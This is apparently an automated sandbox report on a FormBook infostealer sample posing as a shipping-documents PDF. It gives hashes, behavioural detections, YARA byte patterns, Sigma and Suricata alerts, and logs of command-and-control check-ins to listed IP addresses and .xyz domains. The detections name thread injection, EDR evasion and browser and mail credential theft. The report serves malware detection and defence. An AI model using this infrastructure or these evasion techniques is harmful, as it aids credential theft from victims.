Edit tour

Windows Analysis Report
shipping documents_pdf.exe

Overview

General Information

Sample name:	shipping documents_pdf.exe
Analysis ID:	1522476
MD5:	4f04d4af743c4c282b7f86f002f8bcab
SHA1:	c6bc8b3c1e70e81519ddc8d8319d279361cf4c1e
SHA256:	0d3b7f710ac5caa13f9e5cc85ef5a898e16f919e34bf7d47a0067c070fb572ad
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

shipping documents_pdf.exe (PID: 4960 cmdline: "C:\Users\user\Desktop\shipping documents_pdf.exe" MD5: 4F04D4AF743C4C282B7F86F002F8BCAB)

svchost.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\shipping documents_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

jsmAYDUnVBUZ.exe (PID: 4928 cmdline: "C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

schtasks.exe (PID: 1612 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

jsmAYDUnVBUZ.exe (PID: 4248 cmdline: "C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b24ba:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x29a659:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13edf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13edf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f97f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17b1e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b24ba:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x29a659:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13edf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13edf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f073:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17212:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e273:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f073:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17212:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\shipping documents_pdf.exe", CommandLine: "C:\Users\user\Desktop\shipping documents_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping documents_pdf.exe", ParentImage: C:\Users\user\Desktop\shipping documents_pdf.exe, ParentProcessId: 4960, ParentProcessName: shipping documents_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping documents_pdf.exe", ProcessId: 2944, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\shipping documents_pdf.exe", CommandLine: "C:\Users\user\Desktop\shipping documents_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping documents_pdf.exe", ParentImage: C:\Users\user\Desktop\shipping documents_pdf.exe, ParentProcessId: 4960, ParentProcessName: shipping documents_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping documents_pdf.exe", ProcessId: 2944, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T08:31:13.331450+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57393	118.139.176.2	80	TCP
2024-09-30T08:31:36.708741+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57398	83.229.19.82	80	TCP
2024-09-30T08:31:52.799702+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57402	3.33.130.190	80	TCP
2024-09-30T08:32:06.390016+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57406	114.134.188.182	80	TCP
2024-09-30T08:32:19.789279+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57410	162.213.249.216	80	TCP
2024-09-30T08:32:33.016243+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57414	13.248.169.48	80	TCP
2024-09-30T08:32:46.183410+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57418	3.33.130.190	80	TCP
2024-09-30T08:33:20.381336+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57422	8.217.17.192	80	TCP
2024-09-30T08:33:33.823094+0200	2855465	1	A Network Trojan was detected	192.168.2.4	57426	85.159.66.93	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T08:31:29.101732+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57394	83.229.19.82	80	TCP
2024-09-30T08:31:31.618833+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57395	83.229.19.82	80	TCP
2024-09-30T08:31:34.277164+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57396	83.229.19.82	80	TCP
2024-09-30T08:31:42.232883+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57399	3.33.130.190	80	TCP
2024-09-30T08:31:44.767512+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57400	3.33.130.190	80	TCP
2024-09-30T08:31:47.326886+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57401	3.33.130.190	80	TCP
2024-09-30T08:31:59.374257+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57403	114.134.188.182	80	TCP
2024-09-30T08:32:01.923025+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57404	114.134.188.182	80	TCP
2024-09-30T08:32:04.468022+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57405	114.134.188.182	80	TCP
2024-09-30T08:32:12.162893+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57407	162.213.249.216	80	TCP
2024-09-30T08:32:14.693993+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57408	162.213.249.216	80	TCP
2024-09-30T08:32:17.338838+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57409	162.213.249.216	80	TCP
2024-09-30T08:32:25.310872+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57411	13.248.169.48	80	TCP
2024-09-30T08:32:27.833137+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57412	13.248.169.48	80	TCP
2024-09-30T08:32:30.497158+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57413	13.248.169.48	80	TCP
2024-09-30T08:32:38.561031+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57415	3.33.130.190	80	TCP
2024-09-30T08:32:42.025599+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57416	3.33.130.190	80	TCP
2024-09-30T08:32:43.649792+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57417	3.33.130.190	80	TCP
2024-09-30T08:32:52.121545+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57419	8.217.17.192	80	TCP
2024-09-30T08:32:54.646775+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57420	8.217.17.192	80	TCP
2024-09-30T08:32:57.449771+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57421	8.217.17.192	80	TCP
2024-09-30T08:33:27.017005+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57423	85.159.66.93	80	TCP
2024-09-30T08:33:29.562811+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57424	85.159.66.93	80	TCP
2024-09-30T08:33:32.108704+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57425	85.159.66.93	80	TCP
2024-09-30T08:33:39.359479+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57427	13.248.169.48	80	TCP
2024-09-30T08:33:41.932692+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57428	13.248.169.48	80	TCP
2024-09-30T08:33:44.777085+0200	2855464	1	A Network Trojan was detected	192.168.2.4	57429	13.248.169.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: shipping documents_pdf.exe	ReversingLabs: Detection: 23%
Source: shipping documents_pdf.exe	Virustotal: Detection: 32%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: shipping documents_pdf.exe

Joe Sandbox ML: detected

Source: shipping documents_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1856978950.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1856978950.0000000000849000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jsmAYDUnVBUZ.exe, 00000002.00000000.1811498735.00000000007EE000.00000002.00000001.01000000.00000004.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3513782803.00000000007EE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping documents_pdf.exe, 00000000.00000003.1713864417.0000000004430000.00000004.00001000.00020000.00000000.sdmp, shipping documents_pdf.exe, 00000000.00000003.1714725972.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1888759141.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791914003.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1793997709.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3514938661.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1888639333.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3514938661.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1890606069.0000000002B50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping documents_pdf.exe, 00000000.00000003.1713864417.0000000004430000.00000004.00001000.00020000.00000000.sdmp, shipping documents_pdf.exe, 00000000.00000003.1714725972.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1888759141.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1791914003.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1793997709.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000002.3514938661.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1888639333.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3514938661.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1890606069.0000000002B50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.3513571976.0000000000573000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3516006037.000000000332C000.00000004.10000000.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514610443.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2176596569.00000000208FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: schtasks.pdbGCTL source: svchost.exe, 00000001.00000003.1856978950.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1856978950.0000000000849000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000002.00000002.3513935130.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.3513571976.0000000000573000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.3516006037.000000000332C000.00000004.10000000.00040000.00000000.sdmp, jsmAYDUnVBUZ.exe, 00000007.00000002.3514610443.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2176596569.00000000208FC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\schtasks.exe

Code function: 4_2_0041C2E0 FindFirstFileW,FindNextFileW,FindClose,

4_2_0041C2E0

Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4x nop then xor eax, eax	4_2_00409B20
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_00A604DF
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_00A6062F
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 4x nop then xor eax, eax	7_2_04E1D75F
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 4x nop then pop edi	7_2_04E18292

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57413 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57414 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57400 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57399 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57396 -> 83.229.19.82:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57402 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57407 -> 162.213.249.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57417 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57409 -> 162.213.249.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57403 -> 114.134.188.182:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57410 -> 162.213.249.216:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57418 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57416 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57395 -> 83.229.19.82:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57425 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57428 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57420 -> 8.217.17.192:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57401 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57408 -> 162.213.249.216:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57405 -> 114.134.188.182:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57412 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57415 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57421 -> 8.217.17.192:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57423 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57427 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57406 -> 114.134.188.182:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57429 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57422 -> 8.217.17.192:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57424 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57394 -> 83.229.19.82:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57398 -> 83.229.19.82:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57404 -> 114.134.188.182:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57393 -> 118.139.176.2:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:57426 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57411 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:57419 -> 8.217.17.192:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.itaja.xyz
Source:	DNS query: www.restobarbebek.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 83.229.19.82 83.229.19.82

Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKH CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKH
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

